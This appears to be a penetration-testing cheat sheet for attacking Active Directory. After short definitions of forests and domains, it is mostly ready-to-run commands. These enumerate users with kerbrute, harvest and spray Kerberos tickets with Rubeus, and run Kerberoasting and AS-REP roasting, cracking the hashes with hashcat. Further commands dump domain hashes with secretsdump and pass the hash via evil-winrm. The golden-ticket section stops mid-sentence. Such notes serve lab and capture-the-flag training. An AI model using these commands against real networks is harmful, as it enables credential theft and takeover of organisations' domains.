Powered by

# Active Directory

Active Directory is a collection of machines and servers connected inside of domains, that are a collective part of a bigger forest of domains, that make up the Active Directory network.

# Forest

An AD forest is a collection of one or more domain trees inside of an Active Directory network. It is what categorizes the parts of the network as a whole.

Trees - A hierarchy of domains in Active Directory Domain Services
Domains - Used to group and manage objects 
Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs
Trusts - Allows users to access resources in other domains
Objects - users, groups, printers, computers, shares
Domain Services - DNS Server, LLMNR, IPv6
Domain Schema - Rules for object creation

# Enumeration 

net user              # display local users
net user /domain      # display domain joined users
net user mike /domain # display domain joined userinfo

# Kerberos TCP/88

Enumerate users

./kerbrute userenum --dc 10.10.10.10 -d example.local userlist.txt -t 100    #enumerate users using kerbrute
./kerbrute userenum --dc example.local -d example.local User.txt             #sometimes it works better with domain names

Harvesting tickets you can use a utility called rubeus to harvest tickets: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

Rubeus.exe harvest /interval:30

bruteforce tickets This will take a given password and "spray" it against all found users then give the .kirbi TGT if successful. This attack can lock you out.

Rubeus.exe brute /password:Password1 /noticket

# Kerberoasting.

Kerberoasting allows us to request a service ticket for any service with a registered SPN then use that ticket to crack the service password. If the service has a registered SPN then it can be Kerberoastable. Success of the attack depends on password strength and privileges of accounts.

Using impacket:

GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.10.10 -request

Useing Rubeus

Rubeus.exe kerberoast /outfile:hashes.txt /format:hashcat

and then crack

hashcat  -m 13100 hashes.txt -a 0 /usr/share/wordlists/rockyou.txt --force

Now what? You can use those cracked passwords to run services with the permissions assigned.

runas /netonly /User:ServiceAccount1 powershell.exe

# AS-REP Roasting

Similar to Kerberoasting AS-REP Roasting is an attack against accounts with the "Do not require Kerberos preauthentication" or UF_DONT_REQUIRE_PREAUTH set to true.

Example using impacket:

for user in $(cat users.txt); do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done

Example using Rubeus:

Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat

And the crack:

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt --force

# Golden ticket attack

A golden ticket attack works by dumping the ticket-granting ticket of any user on the domain this would preferably be a domain admin however for a golden ticket you would dump the krbtgt ticket and for a silver ticket,

# Dumping secrets

If you get creds for a user who can, you can use impacket secretdumps.py to get hashes from NTDIS.DIT

impacket-secretsdump backup:password1234@10.10.10.10 > secrets.txt

pwd dump format:

<Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:

Note LM hash is not used and only there for backwards compatibility. will be a the hash of "no password" (aad3b435b51404eeaad3b435b51404ee)

# pass the hash

using evil-winrm we can pass hashes found to gain access

./evil-winrm.rb -i 10.10.154.3 -u Administrator -H e4876a80a723612986d7609aa5ebc12b

© Copyright 2021. All rights reserved.